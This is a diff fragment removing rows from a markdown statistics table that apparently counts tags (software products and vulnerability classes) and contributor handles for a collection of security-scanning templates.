-| django               |     8 | x1m_martijn                    |     2 |                  |       |          |       |         |       |
-| solr                 |     8 | r12w4n                         |     2 |                  |       |          |       |         |       |
-| azure                |     8 | swissky                        |     2 |                  |       |          |       |         |       |
-| zyxel                |     8 | udit_thakkur                   |     2 |                  |       |          |       |         |       |
-| amazon               |     8 | kre80r                         |     2 |                  |       |          |       |         |       |
-| confluence           |     8 | lotusdll                       |     2 |                  |       |          |       |         |       |
-| prometheus           |     8 | thardt-praetorian              |     2 |                  |       |          |       |         |       |
-| scada                |     8 | splint3r7                      |     2 |                  |       |          |       |         |       |
-| citrix               |     8 | ree4pwn                        |     2 |                  |       |          |       |         |       |
-| vcenter              |     8 | ambassify                      |     2 |                  |       |          |       |         |       |
-| blind                |     8 | randomrobbie                   |     2 |                  |       |          |       |         |       |
-| exchange             |     7 | zomsop82                       |     2 |                  |       |          |       |         |       |
-| python               |     7 | geekby                         |     2 |                  |       |          |       |         |       |
-| kube                 |     7 | dheerajmadhukar                |     2 |                  |       |          |       |         |       |
-| bucket               |     7 | bernardofsr                    |     2 |                  |       |          |       |         |       |
-| rconfig              |     7 | koti2                          |     2 |                  |       |          |       |         |       |
-| firebase             |     7 | 0xrudra                        |     2 |                  |       |          |       |         |       |
-| mail                 |     7 | bsysop                         |     2 |                  |       |          |       |         |       |
-| vpn                  |     7 | hassan khan yusufzai -         |     2 |                  |       |          |       |         |       |
-|                      |       | splint3r7                      |       |                  |       |          |       |         |       |
-| maps                 |     7 | vsh00t                         |     2 |                  |       |          |       |         |       |
-| elasticsearch        |     7 | luci                           |     2 |                  |       |          |       |         |       |
-| ssti                 |     7 | paradessia                     |     2 |                  |       |          |       |         |       |
-| sonicwall            |     7 | 0xsmiley                       |     2 |                  |       |          |       |         |       |
-| files                |     7 | k11h-de                        |     2 |                  |       |          |       |         |       |
-| squirrelmail         |     7 | kiblyn11                       |     2 |                  |       |          |       |         |       |
-| kafka                |     7 | moritz nentwig                 |     2 |                  |       |          |       |         |       |
-| cicd                 |     6 | afaq                           |     2 |                  |       |          |       |         |       |
-| cnvd2020             |     6 | cckuakilong                    |     2 |                  |       |          |       |         |       |
-| jetty                |     6 | sy3omda                        |     2 |                  |       |          |       |         |       |
-| go                   |     6 | danielmofer                    |     2 |                  |       |          |       |         |       |
-| cobbler              |     6 | sbani                          |     2 |                  |       |          |       |         |       |
-| zimbra               |     6 | g4l1t0                         |     2 |                  |       |          |       |         |       |
-| docker               |     6 | hetroublemakr                  |     2 |                  |       |          |       |         |       |
-| jboss                |     6 | gevakun                        |     2 |                  |       |          |       |         |       |
-| huawei               |     6 | joeldeleep                     |     2 |                  |       |          |       |         |       |
-| enum                 |     6 | martincodes-de                 |     2 |                  |       |          |       |         |       |
-| ecology              |     6 | socketz                        |     2 |                  |       |          |       |         |       |
-| druid                |     6 | amsda                          |     2 |                  |       |          |       |         |       |
-| dedecms              |     6 | 0xprial                        |     2 |                  |       |          |       |         |       |
-| ofbiz                |     6 | vavkamil                       |     2 |                  |       |          |       |         |       |
-| bigip                |     6 | y4er                           |     2 |                  |       |          |       |         |       |
-| nodejs               |     6 | raesene                        |     2 |                  |       |          |       |         |       |
-| sitecore             |     6 | parth                          |     2 |                  |       |          |       |         |       |
-| backdoor             |     6 | 0xelkomy                       |     2 |                  |       |          |       |         |       |
-| fpd                  |     6 | w4cky_                         |     2 |                  |       |          |       |         |       |
-| crlf                 |     6 | mahendra purbia (mah3sec_)     |     2 |                  |       |          |       |         |       |
-| slack                |     6 | ehsahil                        |     2 |                  |       |          |       |         |       |
-| lucee                |     6 | redteambrasil                  |     2 |                  |       |          |       |         |       |
-| magmi                |     6 | huowuzhao                      |     2 |                  |       |          |       |         |       |
-| firmware             |     6 | bing0o                         |     2 |                  |       |          |       |         |       |
-| headless             |     6 | fabaff                         |     2 |                  |       |          |       |         |       |
-| samsung              |     5 | taielab                        |     2 |                  |       |          |       |         |       |
-| artica               |     5 | foulenzer                      |     2 |                  |       |          |       |         |       |
-| opensis              |     5 | hackerarpan                    |     2 |                  |       |          |       |         |       |
-| fatpipe              |     5 | manas_harsh                    |     2 |                  |       |          |       |         |       |
-| thinkphp             |     5 | bp0lr                          |     2 |                  |       |          |       |         |       |
-| gocd                 |     5 | hahwul                         |     2 |                  |       |          |       |         |       |
-| minio                |     5 | nvn1729                        |     2 |                  |       |          |       |         |       |
-| microweber           |     5 | rafaelwdornelas                |     2 |                  |       |          |       |         |       |
-| node                 |     5 | cristi vlad (@cristivlad25)    |     2 |                  |       |          |       |         |       |
-| symantec             |     5 | zinminphy0                     |     1 |                  |       |          |       |         |       |
-| ssl                  |     5 | d0rkerdevil                    |     1 |                  |       |          |       |         |       |
-| solarwinds           |     5 | jeya.seelan                    |     1 |                  |       |          |       |         |       |
-| rfi                  |     5 | ldionmarcil                    |     1 |                  |       |          |       |         |       |
-| zhiyuan              |     5 | x6263                          |     1 |                  |       |          |       |         |       |
-| alibaba              |     5 | kaizensecurity                 |     1 |                  |       |          |       |         |       |
-| git                  |     5 | 0ri2n                          |     1 |                  |       |          |       |         |       |
-| rseenet              |     5 | sherlocksecurity               |     1 |                  |       |          |       |         |       |
-| symfony              |     5 | toufik-airane                  |     1 |                  |       |          |       |         |       |
-| keycloak             |     5 | kiks7                          |     1 |                  |       |          |       |         |       |
-| circarlife           |     5 | revblock                       |     1 |                  |       |          |       |         |       |
-| strapi               |     5 | qlkwej                         |     1 |                  |       |          |       |         |       |
-| storage              |     5 | zhenwarx                       |     1 |                  |       |          |       |         |       |
-| error                |     5 | dawid-czarnecki                |     1 |                  |       |          |       |         |       |
-| leak                 |     5 | luqman                         |     1 |                  |       |          |       |         |       |
-| apisix               |     5 | flag007                        |     1 |                  |       |          |       |         |       |
-| ruby                 |     5 | anon-artist                    |     1 |                  |       |          |       |         |       |
-| icewarp              |     5 | pratik khalane                 |     1 |                  |       |          |       |         |       |
-| kubelet              |     5 | 0xrod                          |     1 |                  |       |          |       |         |       |
-| metinfo              |     5 | rubina119                      |     1 |                  |       |          |       |         |       |
-| moodle               |     5 | clarkvoss                      |     1 |                  |       |          |       |         |       |
-| cache                |     5 | makyotox                       |     1 |                  |       |          |       |         |       |
-| setup                |     5 | borna nematzadeh               |     1 |                  |       |          |       |         |       |
-| panos                |     4 | berkdusunur                    |     1 |                  |       |          |       |         |       |
-| resin                |     4 | soyelmago                      |     1 |                  |       |          |       |         |       |
-| oa                   |     4 | 0xtavian                       |     1 |                  |       |          |       |         |       |
-| adminer              |     4 | alex                           |     1 |                  |       |          |       |         |       |
-| springcloud          |     4 | _c0wb0y_                       |     1 |                  |       |          |       |         |       |
-| hongdian             |     4 | p-l-                           |     1 |                  |       |          |       |         |       |
-| sophos               |     4 | kailashbohara                  |     1 |                  |       |          |       |         |       |
-| hoteldruid           |     4 | orpheus                        |     1 |                  |       |          |       |         |       |
-| mongodb              |     4 | yavolo                         |     1 |                  |       |          |       |         |       |
-| voip                 |     4 | bad5ect0r                      |     1 |                  |       |          |       |         |       |
-| awstats              |     4 | bughuntersurya                 |     1 |                  |       |          |       |         |       |
-| thinkcmf             |     4 | s1r1u5_                        |     1 |                  |       |          |       |         |       |
-| websphere            |     4 | florianmaak                    |     1 |                  |       |          |       |         |       |
-| db                   |     4 | yashanand155                   |     1 |                  |       |          |       |         |       |
-| ognl                 |     4 | wabafet                        |     1 |                  |       |          |       |         |       |
-| artifactory          |     4 | andirrahmani1                  |     1 |                  |       |          |       |         |       |
-| kibana               |     4 | thevillagehacker               |     1 |                  |       |          |       |         |       |
-| prestashop           |     4 | ilovebinbash                   |     1 |                  |       |          |       |         |       |
-| mailchimp            |     4 | fmunozs                        |     1 |                  |       |          |       |         |       |
-| jellyfin             |     4 | akash.c                        |     1 |                  |       |          |       |         |       |
-| flink                |     4 | phyr3wall                      |     1 |                  |       |          |       |         |       |
-| jetbrains            |     4 | ooooooo_q                      |     1 |                  |       |          |       |         |       |
-| elastic              |     4 | 0xd0ff9                        |     1 |                  |       |          |       |         |       |
-| buffalo              |     4 | kba@sogeti_esec                |     1 |                  |       |          |       |         |       |
-| terramaster          |     4 | skylark-lab                    |     1 |                  |       |          |       |         |       |
-| beyondtrust          |     4 | prajiteshsingh                 |     1 |                  |       |          |       |         |       |
-| couchdb              |     4 | ahmetpergamum                  |     1 |                  |       |          |       |         |       |
-| wcs                  |     4 | sicksec                        |     1 |                  |       |          |       |         |       |
-| puppet               |     4 | bibeksapkota (sar00n)          |     1 |                  |       |          |       |         |       |
-| search               |     4 | furkansayim                    |     1 |                  |       |          |       |         |       |
-| cloud                |     4 | nerrorsec                      |     1 |                  |       |          |       |         |       |
-| microstrategy        |     4 | b0rn2r00t                      |     1 |                  |       |          |       |         |       |
-| npm                  |     4 | elder tao                      |     1 |                  |       |          |       |         |       |
-| caucho               |     4 | ph33r                          |     1 |                  |       |          |       |         |       |
-| cacti                |     4 | ok_bye_now                     |     1 |                  |       |          |       |         |       |
-| activemq             |     4 | manasmbellani                  |     1 |                  |       |          |       |         |       |
-| paypal               |     4 | udyz                           |     1 |                  |       |          |       |         |       |
-| smtp                 |     4 | retr0                          |     1 |                  |       |          |       |         |       |
-| photo                |     4 | majidmc2                       |     1 |                  |       |          |       |         |       |
-| cve2007              |     4 | philippdelteil                 |     1 |                  |       |          |       |         |       |
-| plesk                |     4 | akshansh                       |     1 |                  |       |          |       |         |       |
-| asp                  |     4 | lethargynavigator              |     1 |                  |       |          |       |         |       |
-| tikiwiki             |     4 | husain                         |     1 |                  |       |          |       |         |       |
-| kevinlab             |     4 | amnotacat                      |     1 |                  |       |          |       |         |       |
-| ssh                  |     4 | remonsec                       |     1 |                  |       |          |       |         |       |
-| gogs                 |     4 | mesaglio                       |     1 |                  |       |          |       |         |       |
-| hikvision            |     4 | absshax                        |     1 |                  |       |          |       |         |       |
-| aspose               |     4 | retr02332                      |     1 |                  |       |          |       |         |       |
-| cockpit              |     4 | furkansenan                    |     1 |                  |       |          |       |         |       |
-| sonarqube            |     4 | izn0u                          |     1 |                  |       |          |       |         |       |
-| nexus                |     4 | omarkurt                       |     1 |                  |       |          |       |         |       |
-| hpe                  |     4 | apt-mirror                     |     1 |                  |       |          |       |         |       |
-| stripe               |     4 | remi gascou (podalirius)       |     1 |                  |       |          |       |         |       |
-| cnvd2019             |     4 | compr00t                       |     1 |                  |       |          |       |         |       |
-| xmlrpc               |     4 | 3th1c_yuk1                     |     1 |                  |       |          |       |         |       |
-| umbraco              |     3 | th3.d1p4k                      |     1 |                  |       |          |       |         |       |
-| phpinfo              |     3 | push4d                         |     1 |                  |       |          |       |         |       |
-| sharepoint           |     3 | 0xceeb                         |     1 |                  |       |          |       |         |       |
-| openemr              |     3 | streetofhackerr007 (rohit      |     1 |                  |       |          |       |         |       |
-|                      |       | soni)                          |       |                  |       |          |       |         |       |
-| centos               |     3 | ohlinge                        |     1 |                  |       |          |       |         |       |
-| zeroshell            |     3 | tirtha                         |     1 |                  |       |          |       |         |       |
-| ampps                |     3 | iampritam                      |     1 |                  |       |          |       |         |       |
-| netlify              |     3 | alevsk                         |     1 |                  |       |          |       |         |       |
-| linksys              |     3 | daffianfo                      |     1 |                  |       |          |       |         |       |
-| targa                |     3 | mrcl0wnlab                     |     1 |                  |       |          |       |         |       |
-| kingsoft             |     3 | jiheon-dev                     |     1 |                  |       |          |       |         |       |
-| actuator             |     3 | aresx                          |     1 |                  |       |          |       |         |       |
-| bruteforce           |     3 | hanlaomo                       |     1 |                  |       |          |       |         |       |
-| telerik              |     3 | wlayzz                         |     1 |                  |       |          |       |         |       |
-| linkerd              |     3 | vzamanillo                     |     1 |                  |       |          |       |         |       |
-| webadmin             |     3 | becivells                      |     1 |                  |       |          |       |         |       |
-| phppgadmin           |     3 | coldfish                       |     1 |                  |       |          |       |         |       |
-| nacos                |     3 | bernardo rodrigues             |     1 |                  |       |          |       |         |       |
-|                      |       | @bernardofsr | andré monteiro  |       |                  |       |          |       |         |       |
-|                      |       | @am0nt31r0                     |       |                  |       |          |       |         |       |
-| odoo                 |     3 | co0nan                         |     1 |                  |       |          |       |         |       |
-| axigen               |     3 | andysvints                     |     1 |                  |       |          |       |         |       |
-| fuelcms              |     3 | exploitation                   |     1 |                  |       |          |       |         |       |
-| cloudflare           |     3 | rschio                         |     1 |                  |       |          |       |         |       |
-| voipmonitor          |     3 | pudsec                         |     1 |                  |       |          |       |         |       |
-| fanruan              |     3 | 2rs3c                          |     1 |                  |       |          |       |         |       |
-| elfinder             |     3 | aaron_costello                 |     1 |                  |       |          |       |         |       |
-|                      |       | (@conspiracyproof)             |       |                  |       |          |       |         |       |
-| samba                |     3 | jteles                         |     1 |                  |       |          |       |         |       |
-| bitrix               |     3 | twitter.com/dheerajmadhukar    |     1 |                  |       |          |       |         |       |
-| seagate              |     3 | _darrenmartyn                  |     1 |                  |       |          |       |         |       |
-| movable              |     3 | noamrathaus                    |     1 |                  |       |          |       |         |       |
-| kentico              |     3 | evan rubinstien                |     1 |                  |       |          |       |         |       |
-| fortios              |     3 | ahmed sherif                   |     1 |                  |       |          |       |         |       |
-| globalprotect        |     3 | geraldino2                     |     1 |                  |       |          |       |         |       |
-| seeyon               |     3 | b4uh0lz                        |     1 |                  |       |          |       |         |       |
-| trixbox              |     3 | aaronchen0                     |     1 |                  |       |          |       |         |       |
-| thinfinity           |     3 | hexcat                         |     1 |                  |       |          |       |         |       |
-| square               |     3 | clment cruchet                 |     1 |                  |       |          |       |         |       |
-| sendgrid             |     3 | jbaines-r7                     |     1 |                  |       |          |       |         |       |
-| synology             |     3 | mass0ma                        |     1 |                  |       |          |       |         |       |
-| subrion              |     3 | rojanrijal                     |     1 |                  |       |          |       |         |       |
-| wordfence            |     3 | thezakman                      |     1 |                  |       |          |       |         |       |
-| jeesns               |     3 | aceseven (digisec360)          |     1 |                  |       |          |       |         |       |
-| nosqli               |     3 | arr0way                        |     1 |                  |       |          |       |         |       |
-| pentaho              |     3 | intx0x80                       |     1 |                  |       |          |       |         |       |
-| panabit              |     3 | affix                          |     1 |                  |       |          |       |         |       |
-| sql                  |     3 | shifacyclewla                  |     1 |                  |       |          |       |         |       |
-| consul               |     3 | xstp                           |     1 |                  |       |          |       |         |       |
-| aptus                |     3 | act1on3                        |     1 |                  |       |          |       |         |       |
-| mongo                |     3 | j33n1k4                        |     1 |                  |       |          |       |         |       |
-| ebs                  |     3 | daviey                         |     1 |                  |       |          |       |         |       |
-| openam               |     3 | momen eldawakhly               |     1 |                  |       |          |       |         |       |
-| trendnet             |     3 | arall                          |     1 |                  |       |          |       |         |       |
-| horizon              |     3 | un-fmunozs                     |     1 |                  |       |          |       |         |       |
-| log                  |     3 | b0yd                           |     1 |                  |       |          |       |         |       |
-| database             |     3 | igibanez                       |     1 |                  |       |          |       |         |       |
-| smb                  |     3 | luskabol                       |     1 |                  |       |          |       |         |       |
-| glassfish            |     3 | yuansec                        |     1 |                  |       |          |       |         |       |
-| modem                |     3 | ivo palazzolo (@palaziv)       |     1 |                  |       |          |       |         |       |
-| dolibarr             |     3 | tea                            |     1 |                  |       |          |       |         |       |
-| hashicorp            |     3 | oscarintherocks                |     1 |                  |       |          |       |         |       |
-| redis                |     3 | nielsing                       |     1 |                  |       |          |       |         |       |
-| dreambox             |     3 | _harleo                        |     1 |                  |       |          |       |         |       |
-| javascript           |     3 | 0xh7ml                         |     1 |                  |       |          |       |         |       |
-| linkedin             |     3 | exid                           |     1 |                  |       |          |       |         |       |
-| cisa                 |     3 | 0ut0fb4nd                      |     1 |                  |       |          |       |         |       |
-| dos                  |     3 | miroslavsotak                  |     1 |                  |       |          |       |         |       |
-| grav                 |     3 | prettyboyaaditya               |     1 |                  |       |          |       |         |       |
-| httpbin              |     3 | notsoevilweasel                |     1 |                  |       |          |       |         |       |
-| empirecms            |     3 | infosecsanyam                  |     1 |                  |       |          |       |         |       |
-| epson                |     3 | mhdsamx                        |     1 |                  |       |          |       |         |       |
-| lansweeper           |     3 | sec_hawk                       |     1 |                  |       |          |       |         |       |
-| facebook             |     3 | zandros0                       |     1 |                  |       |          |       |         |       |
-| selea                |     3 | matthew nickerson (b0than) @   |     1 |                  |       |          |       |         |       |
-|                      |       | layer 8 security               |       |                  |       |          |       |         |       |
-| lotus                |     3 | dievus                         |     1 |                  |       |          |       |         |       |
-| geowebserver         |     3 | breno_css                      |     1 |                  |       |          |       |         |       |
-| vbulletin            |     3 | justmumu                       |     1 |                  |       |          |       |         |       |
-| oauth                |     3 | c3l3si4n                       |     1 |                  |       |          |       |         |       |
-| vrealize             |     3 | fq_hsu                         |     1 |                  |       |          |       |         |       |
-| httpd                |     3 | bartu utku sarp                |     1 |                  |       |          |       |         |       |
-| splunk               |     3 | mubassirpatel                  |     1 |                  |       |          |       |         |       |
-| sugarcrm             |     3 | chron0x                        |     1 |                  |       |          |       |         |       |
-| concrete             |     3 | manikanta a.k.a @secureitmania |     1 |                  |       |          |       |         |       |
-| nuuo                 |     3 | higor melgaço (eremit4)        |     1 |                  |       |          |       |         |       |
-| circleci             |     3 | korteke                        |     1 |                  |       |          |       |         |       |
-| openssh              |     3 | evolutionsec                   |     1 |                  |       |          |       |         |       |
-| heroku               |     3 | bernardo rodrigues             |     1 |                  |       |          |       |         |       |
-|                      |       | @bernardofsr                   |       |                  |       |          |       |         |       |
-| openbmcs             |     3 | exceed                         |     1 |                  |       |          |       |         |       |
-| exposures            |     3 | xeldax                         |     1 |                  |       |          |       |         |       |
-| 3cx                  |     3 | 0xceba                         |     1 |                  |       |          |       |         |       |
-| axis                 |     3 | notnotnotveg                   |     1 |                  |       |          |       |         |       |
-| graph                |     3 | v0idc0de                       |     1 |                  |       |          |       |         |       |
-| workspaceone         |     3 | luqmaan hadia                  |     1 |                  |       |          |       |         |       |
-| mcafee               |     3 | knassar702                     |     1 |                  |       |          |       |         |       |
-| messaging            |     3 | kurohost                       |     1 |                  |       |          |       |         |       |
-| postmessage          |     3 | streetofhackerr007             |     1 |                  |       |          |       |         |       |
-| rlm                  |     3 | patralos                       |     1 |                  |       |          |       |         |       |
-| axis2                |     3 | 0xteles                        |     1 |                  |       |          |       |         |       |
-| jamf                 |     3 | sshell                         |     1 |                  |       |          |       |         |       |
-| jfrog                |     3 | official_blackhat13            |     1 |                  |       |          |       |         |       |
-| ems                  |     3 | willd96                        |     1 |                  |       |          |       |         |       |
-| prtg                 |     3 | alperenkesk                    |     1 |                  |       |          |       |         |       |
-| craftcms             |     2 | 0h1in9e                        |     1 |                  |       |          |       |         |       |
-| pbootcms             |     2 | brabbit10                      |     1 |                  |       |          |       |         |       |
-| lantronix            |     2 | rodnt                          |     1 |                  |       |          |       |         |       |
-| servicenow           |     2 | ofjaaah                        |     1 |                  |       |          |       |         |       |
-| dvwa                 |     2 | fopina                         |     1 |                  |       |          |       |         |       |
-| watchguard           |     2 | j3ssie/geraldino2              |     1 |                  |       |          |       |         |       |
-| acrolinx             |     2 | petruknisme                    |     1 |                  |       |          |       |         |       |
-| mida                 |     2 | noobexploiter                  |     1 |                  |       |          |       |         |       |
-| zte                  |     2 | bjhulst                        |     1 |                  |       |          |       |         |       |
-| spark                |     2 | narluin                        |     1 |                  |       |          |       |         |       |
-| showdoc              |     2 | manuelbua                      |     1 |                  |       |          |       |         |       |
-| phpstorm             |     2 | shreyapohekar                  |     1 |                  |       |          |       |         |       |
-| hiveos               |     2 | dhiyaneshdki                   |     1 |                  |       |          |       |         |       |
-| docs                 |     2 | thesubtlety                    |     1 |                  |       |          |       |         |       |
-| digitalocean         |     2 | zsusac                         |     1 |                  |       |          |       |         |       |
-| nasos                |     2 | jrolf                          |     1 |                  |       |          |       |         |       |
-| resourcespace        |     2 | harshinsecurity                |     1 |                  |       |          |       |         |       |
-| metersphere          |     2 | brenocss                       |     1 |                  |       |          |       |         |       |
-| alfresco             |     2 | tirtha_mandal                  |     1 |                  |       |          |       |         |       |
-| globaldomains        |     2 | d4vy                           |     1 |                  |       |          |       |         |       |
-| digitalrebar         |     2 | myztique                       |     1 |                  |       |          |       |         |       |
-| avaya                |     2 | kabirsuda                      |     1 |                  |       |          |       |         |       |
-| skycaiji             |     2 | sickwell                       |     1 |                  |       |          |       |         |       |
-| xerox                |     2 | elmahdi                        |     1 |                  |       |          |       |         |       |
-| myfactory            |     2 | regala_                        |     1 |                  |       |          |       |         |       |
-| yapi                 |     2 | sid ahmed malaoui @ realistic  |     1 |                  |       |          |       |         |       |
-|                      |       | security                       |       |                  |       |          |       |         |       |
-| totemomail           |     2 | ratnadip gajbhiye              |     1 |                  |       |          |       |         |       |
-| ruckus               |     2 | cookiehanhoan                  |     1 |                  |       |          |       |         |       |
-| s3                   |     2 | undefl0w                       |     1 |                  |       |          |       |         |       |
-| tapestry             |     2 | hakluke                        |     1 |                  |       |          |       |         |       |
-| key                  |     2 | lark lab                       |     1 |                  |       |          |       |         |       |
-| projectsend          |     2 | mah3sec_                       |     1 |                  |       |          |       |         |       |
-| kiwitcms             |     2 | rotemreiss                     |     1 |                  |       |          |       |         |       |
-| pacsone              |     2 | duty_1g                        |     1 |                  |       |          |       |         |       |
-| rosariosis           |     2 | nytr0gen                       |     1 |                  |       |          |       |         |       |
-| auerswald            |     2 | yashgoti                       |     1 |                  |       |          |       |         |       |
-| cve2005              |     2 | elouhi                         |     1 |                  |       |          |       |         |       |
-| itop                 |     2 | tim_koopmans                   |     1 |                  |       |          |       |         |       |
-| pascom               |     2 | adrianmf                       |     1 |                  |       |          |       |         |       |
-| tableau              |     2 | ringo                          |     1 |                  |       |          |       |         |       |
-| exacqvision          |     2 | juicypotato1                   |     1 |                  |       |          |       |         |       |
-| iptime               |     2 | deena                          |     1 |                  |       |          |       |         |       |
-| azkaban              |     2 | kareemse1im                    |     1 |                  |       |          |       |         |       |
-| jsf                  |     2 | whynotke                       |     1 |                  |       |          |       |         |       |
-| accela               |     2 | osamahamad                     |     1 |                  |       |          |       |         |       |
-| bigant               |     2 | jeya seelan                    |     1 |                  |       |          |       |         |       |
-| labkey               |     2 | francescocarlucci              |     1 |                  |       |          |       |         |       |
-| jquery               |     2 | gboddin                        |     1 |                  |       |          |       |         |       |
-| ilo                  |     2 | thebinitghimire                |     1 |                  |       |          |       |         |       |
-| owasp                |     2 | f1she3                         |     1 |                  |       |          |       |         |       |
-| bigbluebutton        |     2 | droberson                      |     1 |                  |       |          |       |         |       |
-| gitlist              |     2 | jas37                          |     1 |                  |       |          |       |         |       |
-| apollo               |     2 | kishore krishna (sillydaddy)   |     1 |                  |       |          |       |         |       |
-| proftpd              |     2 | ggranjus                       |     1 |                  |       |          |       |         |       |
-| akamai               |     2 | ipanda                         |     1 |                  |       |          |       |         |       |
-| mantisbt             |     2 | shelld3v                       |     1 |                  |       |          |       |         |       |
-| sequoiadb            |     2 | micha3lb3n                     |     1 |                  |       |          |       |         |       |
-| chiyu                |     2 | schniggie                      |     1 |                  |       |          |       |         |       |
-| webmin               |     2 | ola456                         |     1 |                  |       |          |       |         |       |
-| csrf                 |     2 | ahmed abou-ela                 |     1 |                  |       |          |       |         |       |
-| tileserver           |     2 | pdp                            |     1 |                  |       |          |       |         |       |
-| seacms               |     2 | alexrydzak                     |     1 |                  |       |          |       |         |       |
-| webcam               |     2 | blckraven                      |     1 |                  |       |          |       |         |       |
-| couchbase            |     2 | xshuden                        |     1 |                  |       |          |       |         |       |
-| javamelody           |     2 | opencirt                       |     1 |                  |       |          |       |         |       |
-| frontpage            |     2 | charanrayudu                   |     1 |                  |       |          |       |         |       |
-| places               |     2 |                                |       |                  |       |          |       |         |       |
-| yii                  |     2 |                                |       |                  |       |          |       |         |       |
-| livezilla            |     2 |                                |       |                  |       |          |       |         |       |
-| flightpath           |     2 |                                |       |                  |       |          |       |         |       |
-| netsus               |     2 |                                |       |                  |       |          |       |         |       |
-| zblogphp             |     2 |                                |       |                  |       |          |       |         |       |
-| xweb500              |     2 |                                |       |                  |       |          |       |         |       |
-| orchid               |     2 |                                |       |                  |       |          |       |         |       |
-| jitsi                |     2 |                                |       |                  |       |          |       |         |       |
-| graphite             |     2 |                                |       |                  |       |          |       |         |       |
-| jmx                  |     2 |                                |       |                  |       |          |       |         |       |
-| gitbook              |     2 |                                |       |                  |       |          |       |         |       |
-| code42               |     2 |                                |       |                  |       |          |       |         |       |
-| dotcms               |     2 |                                |       |                  |       |          |       |         |       |
-| plastic              |     2 |                                |       |                  |       |          |       |         |       |
-| appcms               |     2 |                                |       |                  |       |          |       |         |       |
-| password             |     2 |                                |       |                  |       |          |       |         |       |
-| natshell             |     2 |                                |       |                  |       |          |       |         |       |
-| igs                  |     2 |                                |       |                  |       |          |       |         |       |
-| airtame              |     2 |                                |       |                  |       |          |       |         |       |
-| sangfor              |     2 |                                |       |                  |       |          |       |         |       |
-| pgadmin              |     2 |                                |       |                  |       |          |       |         |       |
-| pega                 |     2 |                                |       |                  |       |          |       |         |       |
-| sentry               |     2 |                                |       |                  |       |          |       |         |       |
-| bmc                  |     2 |                                |       |                  |       |          |       |         |       |
-| phpshowtime          |     2 |                                |       |                  |       |          |       |         |       |
-| cloudinary           |     2 |                                |       |                  |       |          |       |         |       |
-| influxdb             |     2 |                                |       |                  |       |          |       |         |       |
-| pcoip                |     2 |                                |       |                  |       |          |       |         |       |
-| ansible              |     2 |                                |       |                  |       |          |       |         |       |
-| weather              |     2 |                                |       |                  |       |          |       |         |       |
-| qcubed               |     2 |                                |       |                  |       |          |       |         |       |
-| seeddms              |     2 |                                |       |                  |       |          |       |         |       |
-| cyberoam             |     2 |                                |       |                  |       |          |       |         |       |
-| impresscms           |     2 |                                |       |                  |       |          |       |         |       |
-| detect               |     2 |                                |       |                  |       |          |       |         |       |
-| ec2                  |     2 |                                |       |                  |       |          |       |         |       |
-| zzzcms               |     2 |                                |       |                  |       |          |       |         |       |
-| netflix              |     2 |                                |       |                  |       |          |       |         |       |
-| openwrt              |     2 |                                |       |                  |       |          |       |         |       |
-| codeigniter          |     2 |                                |       |                  |       |          |       |         |       |
-| openfire             |     2 |                                |       |                  |       |          |       |         |       |
-| harbor               |     2 |                                |       |                  |       |          |       |         |       |
-| rocketchat           |     2 |                                |       |                  |       |          |       |         |       |
-| guacamole            |     2 |                                |       |                  |       |          |       |         |       |
-| matrix               |     2 |                                |       |                  |       |          |       |         |       |
-| ambari               |     2 |                                |       |                  |       |          |       |         |       |
-| tidb                 |     2 |                                |       |                  |       |          |       |         |       |
-| mobileiron           |     2 |                                |       |                  |       |          |       |         |       |
-| saltstack            |     2 |                                |       |                  |       |          |       |         |       |
-| qihang               |     2 |                                |       |                  |       |          |       |         |       |
-| hostheader-injection |     2 |                                |       |                  |       |          |       |         |       |
-| openvpn              |     2 |                                |       |                  |       |          |       |         |       |
-| emqx                 |     2 |                                |       |                  |       |          |       |         |       |
-| rancher              |     2 |                                |       |                  |       |          |       |         |       |
-| embed                |     2 |                                |       |                  |       |          |       |         |       |
-| intercom             |     2 |                                |       |                  |       |          |       |         |       |
-| lighttpd             |     2 |                                |       |                  |       |          |       |         |       |
-| frp                  |     2 |                                |       |                  |       |          |       |         |       |
-| cgi                  |     2 |                                |       |                  |       |          |       |         |       |
-| jeedom               |     2 |                                |       |                  |       |          |       |         |       |
-| apereo               |     2 |                                |       |                  |       |          |       |         |       |
-| tongda               |     2 |                                |       |                  |       |          |       |         |       |
-| seowon               |     2 |                                |       |                  |       |          |       |         |       |
-| cve2006              |     2 |                                |       |                  |       |          |       |         |       |
-| pam                  |     2 |                                |       |                  |       |          |       |         |       |
-| terraform            |     2 |                                |       |                  |       |          |       |         |       |
-| ebook                |     2 |                                |       |                  |       |          |       |         |       |
-| viewpoint            |     2 |                                |       |                  |       |          |       |         |       |
-| smartstore           |     2 |                                |       |                  |       |          |       |         |       |
-| hjtcloud             |     2 |                                |       |                  |       |          |       |         |       |
-| gitea                |     2 |                                |       |                  |       |          |       |         |       |
-| alienvault           |     2 |                                |       |                  |       |          |       |         |       |
-| listserv             |     2 |                                |       |                  |       |          |       |         |       |
-| casdoor              |     2 |                                |       |                  |       |          |       |         |       |
-| gophish              |     2 |                                |       |                  |       |          |       |         |       |
-| wuzhicms             |     2 |                                |       |                  |       |          |       |         |       |
-| metabase             |     2 |                                |       |                  |       |          |       |         |       |
-| swagger              |     2 |                                |       |                  |       |          |       |         |       |
-| openstack            |     2 |                                |       |                  |       |          |       |         |       |
-| checkpoint           |     2 |                                |       |                  |       |          |       |         |       |
-| nagios               |     2 |                                |       |                  |       |          |       |         |       |
-| dubbo                |     2 |                                |       |                  |       |          |       |         |       |
-| konga                |     2 |                                |       |                  |       |          |       |         |       |
-| chamilo              |     2 |                                |       |                  |       |          |       |         |       |
-| chyrp                |     2 |                                |       |                  |       |          |       |         |       |
-| gespage              |     2 |                                |       |                  |       |          |       |         |       |
-| otobo                |     2 |                                |       |                  |       |          |       |         |       |
-| erxes                |     2 |                                |       |                  |       |          |       |         |       |
-| payara               |     2 |                                |       |                  |       |          |       |         |       |
-| horde                |     2 |                                |       |                  |       |          |       |         |       |
-| thruk                |     2 |                                |       |                  |       |          |       |         |       |
-| hadoop               |     2 |                                |       |                  |       |          |       |         |       |
-| pulse                |     2 |                                |       |                  |       |          |       |         |       |
-| kong                 |     2 |                                |       |                  |       |          |       |         |       |
-| versa                |     2 |                                |       |                  |       |          |       |         |       |
-| xxljob               |     2 |                                |       |                  |       |          |       |         |       |
-| idrac                |     2 |                                |       |                  |       |          |       |         |       |
-| circontrol           |     2 |                                |       |                  |       |          |       |         |       |
-| motorola             |     2 |                                |       |                  |       |          |       |         |       |
-| homematic            |     2 |                                |       |                  |       |          |       |         |       |
-| avantfax             |     2 |                                |       |                  |       |          |       |         |       |
-| ixcache              |     2 |                                |       |                  |       |          |       |         |       |
